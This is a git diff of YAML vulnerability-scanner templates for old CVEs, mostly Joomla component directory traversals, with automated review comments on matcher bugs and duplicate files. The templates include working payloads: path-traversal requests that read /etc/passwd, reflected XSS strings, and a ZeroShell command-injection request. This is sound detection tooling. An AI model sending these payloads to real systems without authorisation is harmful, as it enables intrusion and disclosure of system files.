+ - '{{BaseURL}}/src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search'
+ - '{{BaseURL}}/src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search'
+ - '{{BaseURL}}/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: body
+ words:
+ - ""
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
diff --git a/poc/cve/cve-2007-4504-1342.yaml b/poc/cve/cve-2007-4504-1342.yaml
deleted file mode 100644
index cd53fb2ce7..0000000000
--- a/poc/cve/cve-2007-4504-1342.yaml
+++ /dev/null
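Review bot: The body `word` matcher is the empty string as shown here (`words:` followed by `- ""`), and an empty word is contained in every body, so with the status and `text/html` header checks the template would report any HTML page that answers 200 on the first path. The intended word is presumably the reflected payload that the `path` entries send URL-encoded; the markup may have been stripped when this page was rendered, so check the file itself and make sure the matcher holds the decoded payload string. With `stop-at-first-match: true` a false hit on the first path also hides the results for the other four paths.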
@@ -1,25 +0,0 @@ -id: CVE-2007-4504 -info: - name: Joomla! Component RSfiles <=1.0.2 - Arbitrary File Retrieval - author: daffainfo - severity: high - description: An arbitrary file retrieval vulnerability in index.php in the RSfiles component (com_rsfiles) <=1.0.2 for Joomla! allows remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action. - reference: - - https://www.exploit-db.com/exploits/4307 - - https://www.cvedetails.com/cve/CVE-2007-4504 - - https://exchange.xforce.ibmcloud.com/vulnerabilities/36222 - classification: - cve-id: CVE-2007-4504 - tags: cve,cve2007,joomla,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 diff --git a/poc/cve/cve-2008-6222.yaml b/poc/cve/cve-2008-6222.yaml new file mode 100644 index 0000000000..e1788f6280 --- /dev/null +++ b/poc/cve/cve-2008-6222.yaml 
@@ -0,0 +1,31 @@
+id: CVE-2008-6222
+
+info:
+ name: Joomla! Component ProDesk 1.0/1.2 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/6980
+ - https://www.cvedetails.com/cve/CVE-2008-6222
+ - http://secunia.com/advisories/32523
+ - http://web.archive.org/web/20210121184244/https://www.securityfocus.com/bid/32113/
+ classification:
+ cve-id: CVE-2008-6222
+ tags: cve,cve2008,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/cve-2008-6668-1400.yaml b/poc/cve/cve-2008-6668-1400.yaml
deleted file mode 100644
index aa5fb3a3cc..0000000000
--- a/poc/cve/cve-2008-6668-1400.yaml
+++ /dev/null
@@ -1,28 +0,0 @@ -id: CVE-2008-6668 -info: - name: nweb2fax <= 0.2.7 Directory Traversal - author: geeknik - severity: high - description: Multiple directory traversal vulnerabilities in nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via .. in the id parameter to comm.php and var_filename parameter to viewrq.php. - reference: - - https://www.exploit-db.com/exploits/5856 - - https://nvd.nist.gov/vuln/detail/CVE-2008-6668 - - http://www.securityfocus.com/bid/29804 - - https://exchange.xforce.ibmcloud.com/vulnerabilities/43173 - classification: - cve-id: CVE-2008-6668 - tags: nweb2fax,lfi,cve,cve2008,traversal -requests: - - method: GET - path: - - "{{BaseURL}}/comm.php?id=../../../../../../../../../../etc/passwd" - - "{{BaseURL}}/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - part: body - regex: - - "root:.*:0:0:" diff --git a/poc/cve/cve-2009-0545.yaml b/poc/cve/cve-2009-0545.yaml new file mode 100644 index 0000000000..e1770bbbbf --- /dev/null +++ b/poc/cve/cve-2009-0545.yaml 
@@ -0,0 +1,40 @@
+id: CVE-2009-0545
+
+info:
+ name: ZeroShell <= 1.0beta11 Remote Code Execution
+ author: geeknik
+ severity: critical
+ description: ZeroShell 1.0beta11 and earlier via cgi-bin/kerbynet allows remote attackers to execute arbitrary commands through shell metacharacters in the type parameter in a NoAuthREQ x509List action.
+ remediation: |
+ Upgrade to a patched version of ZeroShell.
+ reference:
+ - https://www.exploit-db.com/exploits/8023
+ - https://nvd.nist.gov/vuln/detail/CVE-2009-0545
+ - http://www.zeroshell.net/eng/announcements/
+ - http://www.ikkisoft.com/stuff/LC-2009-01.txt
+ - http://www.vupen.com/english/advisories/2009/0385
+ classification:
+ cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C
+ cvss-score: 10
+ cve-id: CVE-2009-0545
+ cwe-id: CWE-20
+ epss-score: 0.97081
+ epss-percentile: 0.99716
+ cpe: cpe:2.3:a:zeroshell:zeroshell:1.0:beta1:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: zeroshell
+ product: zeroshell
+ tags: edb,cve,cve2009,zeroshell,kerbynet,rce
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22"
+
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - "root:.*:0:0:"
+# digest: 4a0a004730450220022b5671694e2b5fe7f22f35d6d90d5d2c0ce4ce36385e3f95b06f8da7146dcc022100cc64174f94989d87c993f1e44ea80fed1af54b841ddfbf0e6c5bb6395343ac1a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/cve-2009-1496.yaml b/poc/cve/cve-2009-1496.yaml
deleted file mode 100644
index 51ca80e5ee..0000000000
--- a/poc/cve/cve-2009-1496.yaml
+++ /dev/null
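Review bot: The `cpe` value names `zeroshell:1.0:beta1` while `name` and `description` say 1.0beta11 and earlier; if the CPE feeds asset matching, confirm which version string is meant (it may simply mirror the NVD entry). This file uses the top-level `http:` key and carries a `# digest:` trailer, whereas the other templates added in this part of the commit use the older `requests:` key and have no digest, so the batch mixes two template generations; moving the others to `http:` would keep the directory consistent.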
@@ -1,31 +0,0 @@ -id: CVE-2009-1496 - -info: - name: Joomla! Component Cmimarketplace - 'viewit' Directory Traversal - author: daffainfo - severity: high - description: Directory traversal vulnerability in the Cmi Marketplace (com_cmimarketplace) component 0.1 for Joomla! allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/8367 - - https://www.cvedetails.com/cve/CVE-2009-1496 - - http://web.archive.org/web/20210121190149/https://www.securityfocus.com/bid/34431/ - - http://www.securityfocus.com/bid/34431 - classification: - cve-id: CVE-2009-1496 - tags: cve,cve2009,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/poc/cve/cve-2009-2015-1441.yaml b/poc/cve/cve-2009-2015-1441.yaml deleted file mode 100644 index 2085a00bd4..0000000000 --- a/poc/cve/cve-2009-2015-1441.yaml +++ /dev/null 
@@ -1,26 +0,0 @@ -id: CVE-2009-2015 -info: - name: Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in includes/file_includer.php in the Ideal MooFAQ (com_moofaq) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. - reference: - - https://www.exploit-db.com/exploits/8898 - - https://www.cvedetails.com/cve/CVE-2009-2015 - - http://web.archive.org/web/20210121191105/https://www.securityfocus.com/bid/35259/ - - http://www.vupen.com/english/advisories/2009/1530 - classification: - cve-id: CVE-2009-2015 - tags: cve,cve2009,joomla,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 diff --git a/poc/cve/cve-2009-2100-1446.yaml b/poc/cve/cve-2009-2100-1446.yaml deleted file mode 100644 index 17c3fc5ae2..0000000000 --- a/poc/cve/cve-2009-2100-1446.yaml +++ /dev/null 
@@ -1,37 +0,0 @@ -id: CVE-2009-2100 - -info: - name: Joomla! JoomlaPraise Projectfork 2.0.10 - Local File Inclusion - author: daffainfo - severity: high - description: Joomla! JoomlaPraise Projectfork (com_projectfork) 2.0.10 allows remote attackers to read arbitrary files via local file inclusion in the section parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/8946 - - https://www.cvedetails.com/cve/CVE-2009-2100 - - http://web.archive.org/web/20210121191226/https://www.securityfocus.com/bid/35378/ - - https://nvd.nist.gov/vuln/detail/CVE-2009-2100 - - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 - cve-id: CVE-2009-2100 - cwe-id: CWE-22 - tags: cve,cve2009,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_projectfork§ion=../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/06 diff --git a/poc/cve/cve-2009-3053.yaml b/poc/cve/cve-2009-3053.yaml deleted file mode 100644 index 9457d3a08b..0000000000 --- a/poc/cve/cve-2009-3053.yaml +++ /dev/null 
@@ -1,31 +0,0 @@ -id: CVE-2009-3053 - -info: - name: Joomla! Component Agora 3.0.0b (com_agora) - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the Agora (com_agora) component 3.0.0b for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the action parameter to the avatars page, reachable through index.php. - reference: - - https://www.exploit-db.com/exploits/9564 - - https://www.cvedetails.com/cve/CVE-2009-3053 - - https://web.archive.org/web/20210120183330/https://www.securityfocus.com/bid/36207/ - - https://exchange.xforce.ibmcloud.com/vulnerabilities/52964 - classification: - cve-id: CVE-2009-3053 - tags: cve,cve2009,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/poc/cve/cve-2010-0943.yaml b/poc/cve/cve-2010-0943.yaml new file mode 100644 index 0000000000..3f73c1501d --- /dev/null +++ b/poc/cve/cve-2010-0943.yaml 
@@ -0,0 +1,30 @@
+id: CVE-2010-0943
+
+info:
+ name: Joomla! Component com_jashowcase - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/11090
+ - https://www.cvedetails.com/cve/CVE-2010-0943
+ - http://web.archive.org/web/20210121193737/https://www.securityfocus.com/bid/37692/
+ - http://secunia.com/advisories/33486
+ classification:
+ cve-id: CVE-2010-0943
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/03/30
diff --git a/poc/cve/cve-2010-0972-1522.yaml b/poc/cve/cve-2010-0972-1522.yaml
deleted file mode 100644
index 59555acafe..0000000000
--- a/poc/cve/cve-2010-0972-1522.yaml
+++ /dev/null
@@ -1,26 +0,0 @@ -id: CVE-2010-0972 -info: - name: Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. - remediation: Apply all relevant security patches and product upgrades. - reference: - - https://www.exploit-db.com/exploits/11738 - - https://www.cvedetails.com/cve/CVE-2010-0972 - tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-0972 -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/13 diff --git a/poc/cve/cve-2010-0982.yaml b/poc/cve/cve-2010-0982.yaml new file mode 100644 index 0000000000..62c7d669aa --- /dev/null +++ b/poc/cve/cve-2010-0982.yaml 
@@ -0,0 +1,30 @@
+id: CVE-2010-0982
+
+info:
+ name: Joomla! Component com_cartweberp - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/10942
+ - https://www.cvedetails.com/cve/CVE-2010-0982
+ - http://web.archive.org/web/20210121193625/https://www.securityfocus.com/bid/37581/
+ - http://secunia.com/advisories/37917
+ remediation: Apply all relevant security patches and product upgrades.
+ classification:
+ cve-id: CVE-2010-0982
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+# Enhanced by mp on 2022/02/13
diff --git a/poc/cve/cve-2010-1056.yaml b/poc/cve/cve-2010-1056.yaml
deleted file mode 100644
index 3bb66b1b8c..0000000000
--- a/poc/cve/cve-2010-1056.yaml
+++ /dev/null
@@ -1,30 +0,0 @@ -id: CVE-2010-1056 - -info: - name: Joomla! Component com_rokdownloads - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/11760 - - https://www.cvedetails.com/cve/CVE-2010-1056 - - http://web.archive.org/web/20210121194803/https://www.securityfocus.com/bid/38741/ - - http://secunia.com/advisories/38982 - remediation: Apply all relevant security patches and product upgrades. - classification: - cve-id: CVE-2010-1056 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/13 diff --git a/poc/cve/cve-2010-1302-1567.yaml b/poc/cve/cve-2010-1302-1567.yaml deleted file mode 100644 index 5d8ce4f2be..0000000000 --- a/poc/cve/cve-2010-1302-1567.yaml +++ /dev/null 
@@ -1,28 +0,0 @@ -id: CVE-2010-1302 -info: - name: Joomla! Component DW Graph - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/11978 - - https://www.cvedetails.com/cve/CVE-2010-1302 - - http://web.archive.org/web/20210121195144/https://www.securityfocus.com/bid/39108/ - - http://secunia.com/advisories/39200 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1302 - tags: cve,cve2010,joomla,lfi,graph -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/14 diff --git a/poc/cve/cve-2010-1305-1574.yaml b/poc/cve/cve-2010-1305-1574.yaml deleted file mode 100644 index 16b05cf68b..0000000000 --- a/poc/cve/cve-2010-1305-1574.yaml +++ /dev/null 
@@ -1,26 +0,0 @@ -id: CVE-2010-1305 -info: - name: Joomla! Component JInventory 1.23.02 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - remediation: Upgrade to a supported version. - reference: - - https://www.exploit-db.com/exploits/12065 - - https://www.cvedetails.com/cve/CVE-2010-1305 - tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-1305 -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/14 diff --git a/poc/cve/cve-2010-1307-1585.yaml b/poc/cve/cve-2010-1307-1585.yaml deleted file mode 100644 index 9b29490b2d..0000000000 --- a/poc/cve/cve-2010-1307-1585.yaml +++ /dev/null 
@@ -1,26 +0,0 @@ -id: CVE-2010-1307 -info: - name: Joomla! Component Magic Updater - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - remediation: Upgrade to a supported version. - reference: - - https://www.exploit-db.com/exploits/12070 - - https://www.cvedetails.com/cve/CVE-2010-1307 - tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-1307 -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/14 diff --git a/poc/cve/cve-2010-1308.yaml b/poc/cve/cve-2010-1308.yaml deleted file mode 100644 index f9f2d84665..0000000000 --- a/poc/cve/cve-2010-1308.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2010-1308 - -info: - name: Joomla! Component SVMap 1.1.1 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12066 - - https://www.cvedetails.com/cve/CVE-2010-1308 - - http://www.vupen.com/english/advisories/2010/0809 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1308 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/14 
diff --git a/poc/cve/cve-2010-1312-1598.yaml b/poc/cve/cve-2010-1312-1598.yaml
new file mode 100644
index 0000000000..e30c60b7d4
--- /dev/null
+++ b/poc/cve/cve-2010-1312-1598.yaml
@@ -0,0 +1,28 @@
+id: CVE-2010-1312
+info:
+ name: Joomla! Component News Portal 1.5.x - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12077
+ - https://www.cvedetails.com/cve/CVE-2010-1312
+ - http://secunia.com/advisories/39289
+ - http://packetstormsecurity.org/1004-exploits/joomlanewportal-lfi.txt
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-1312
+ tags: cve,cve2010,joomla,lfi
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+# Enhanced by mp on 2022/02/14
diff --git a/poc/cve/cve-2010-1312.yaml b/poc/cve/cve-2010-1312.yaml
new file mode 100644
index 0000000000..cc121bbc5f
--- /dev/null
+++ b/poc/cve/cve-2010-1312.yaml
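Review bot: This commit adds cve-2010-1312-1598.yaml and cve-2010-1312.yaml with the same `id: CVE-2010-1312`, the same request path and the same matchers; as far as the two hunks show, they differ only in blank lines. Running the directory sends the identical request twice per target and reports each finding twice under one id, which inflates both scan traffic and the result count. One of the two files should be dropped.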
@@ -0,0 +1,30 @@
+id: CVE-2010-1312
+
+info:
+ name: Joomla! Component News Portal 1.5.x - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12077
+ - https://www.cvedetails.com/cve/CVE-2010-1312
+ - http://secunia.com/advisories/39289
+ - http://packetstormsecurity.org/1004-exploits/joomlanewportal-lfi.txt
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-1312
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+# Enhanced by mp on 2022/02/14
diff --git a/poc/cve/cve-2010-1313-1604.yaml b/poc/cve/cve-2010-1313-1604.yaml
new file mode 100644
index 0000000000..57e5496cfa
--- /dev/null
+++ b/poc/cve/cve-2010-1313-1604.yaml
@@ -0,0 +1,30 @@
+id: CVE-2010-1313
+
+info:
+ name: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12082
+ - https://www.cvedetails.com/cve/CVE-2010-1313
+ - http://web.archive.org/web/20210121195302/https://www.securityfocus.com/bid/39237/
+ - http://www.securityfocus.com/bid/39237
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-1313
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+# Enhanced by mp on 2022/02/14
diff --git a/poc/cve/cve-2010-1314.yaml b/poc/cve/cve-2010-1314.yaml
deleted file mode 100644
index 8801e334b1..0000000000
--- a/poc/cve/cve-2010-1314.yaml
+++ /dev/null
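Review bot: `name` says `Saber Cart` while the description and the request path use Seber Cart (`com_sebercart`), so a search for the component by name misses this template; `name: Joomla! Component Seber Cart 1.0.0.12 - Local File Inclusion` would match the rest of the file. The description limits the issue to hosts where `magic_quotes_gpc` is disabled, which matters when reading a clean scan: no match does not show that the component is patched, and a short comment above `requests:` saying so would help whoever triages the results.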
@@ -1,30 +0,0 @@ -id: CVE-2010-1314 - -info: - name: Joomla! Component Highslide 1.5 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12086 - - https://www.cvedetails.com/cve/CVE-2010-1314 - - http://secunia.com/advisories/39359 - - http://packetstormsecurity.org/1004-exploits/joomlahsconfig-lfi.txt - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1314 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/14 diff --git a/poc/cve/cve-2010-1315.yaml b/poc/cve/cve-2010-1315.yaml new file mode 100644 index 0000000000..d17b7846a7 --- /dev/null +++ b/poc/cve/cve-2010-1315.yaml 
@@ -0,0 +1,30 @@
+id: CVE-2010-1315
+
+info:
+ name: Joomla! Component webERPcustomer - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/11999
+ - https://www.cvedetails.com/cve/CVE-2010-1315
+ - http://secunia.com/advisories/39209
+ - http://packetstormsecurity.org/1004-exploits/joomlaweberpcustomer-lfi.txt
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-1315
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+# Enhanced by mp on 2022/02/14
diff --git a/poc/cve/cve-2010-1345-1621.yaml b/poc/cve/cve-2010-1345-1621.yaml
new file mode 100644
index 0000000000..814e4ab08a
--- /dev/null
+++ b/poc/cve/cve-2010-1345-1621.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-1345
+
+info:
+ name: Joomla! Component Cookex Agency CKForms - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/15453
+ - https://www.cvedetails.com/cve/CVE-2010-1345
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/cve-2010-1345.yaml b/poc/cve/cve-2010-1345.yaml
new file mode 100644
index 0000000000..d97a1f819f
--- /dev/null
+++ b/poc/cve/cve-2010-1345.yaml
@@ -0,0 +1,29 @@
+id: CVE-2010-1345
+
+info:
+ name: Joomla! Component Cookex Agency CKForms - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/15453
+ - https://www.cvedetails.com/cve/CVE-2010-1345
+ - http://www.exploit-db.com/exploits/11785
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-1345
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+# Enhanced by mp on 2022/02/14
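Review bot: cve-2010-1345-1621.yaml and cve-2010-1345.yaml are both added with `id: CVE-2010-1345` and the same request, so every target is probed twice and each finding is reported twice. The -1621 copy is also the weaker of the two: its regex is `"root:.*:0:0"` without the trailing colon that the other copy uses (`"root:.*:0:0:"`), which loosens the match, and it has no `remediation` or `classification` block. Keeping only cve-2010-1345.yaml would resolve both points.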
